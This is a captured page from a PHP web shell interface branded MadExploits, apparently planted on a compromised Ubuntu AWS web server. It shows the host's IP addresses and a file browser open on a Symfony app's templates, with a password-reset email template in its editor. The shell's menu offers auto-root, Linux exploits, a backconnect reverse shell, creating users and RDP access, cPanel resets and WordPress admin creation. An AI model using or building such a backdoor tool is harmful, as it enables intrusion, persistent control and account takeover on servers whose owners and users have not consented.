Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.21.106.4
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mixchief_app /
templates /
Users /
[ HOME SHELL ]
Name
Size
Permission
Action
confirmation.html.twig
414
B
-rw-rw-r--
email.html.twig
1.97
KB
-rw-rw-r--
emailsent.html.twig
403
B
-rw-rw-r--
passwordchange.html.twig
1.72
KB
-rw-rw-r--
passwordemail.html.twig
1.97
KB
-rw-rw-r--
passwordreset.html.twig
865
B
-rw-rw-r--
profile.html.twig
1.75
KB
-rw-rw-r--
receipt.html.twig
5.25
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : passwordemail.html.twig
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <title>Amply - Reset Password</title> <style type="text/css"> #outlook a {padding:0;} body{width:100% !important; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%; margin:0; padding:0; font-family: sans-serif;} #backgroundTable {margin:0; padding:0; width:100% !important; line-height: 100% !important;} .message p { padding-top: 15px; } .social-list li { display: inline; } .social-list li a { } .social-list li a img { width: 20px; } </style> </head> <body> <table cellpadding="0" cellspacing="0" border="0" id="backgroundTable" width="100%"> <tr> <td align="center"> <table cellpadding="0" cellspacing="0" border="0" align="center" width="600"> <tr> <td align="center" style="padding-top: 30px;"> <img style="width: 300px;" src="{{ asset('images/amply.png') }}" alt="Header" /> </td> </tr> <tr class="message"> <td style="padding: 30px; color: #222; font-family: 'Effra Regular', sans-serif;"> <p style="margin-bottom: 20px; font-weight: normal; padding-top: 0">Dear {{ name }}</p> <p>You are receiving this email because you requested to change your password. Please click the link below to continue</p> <a style="padding: 10px 20px; background: #222; color: #fff; border: none;" href="{{ host }}{{ path('password_reset', {'token': token}) }}">Change password</a> <p style="font-weight: bold;">Regards, <br />Amply</p> </td> </tr> <tr style="background-color: #222; color: #fff;"> <td> <p style="padding: 14px; font-style: italic; font-size: 12px;">© 2021 Amply.</p> </td> </tr> </table> </td> </tr> </table> </body> </html>
Close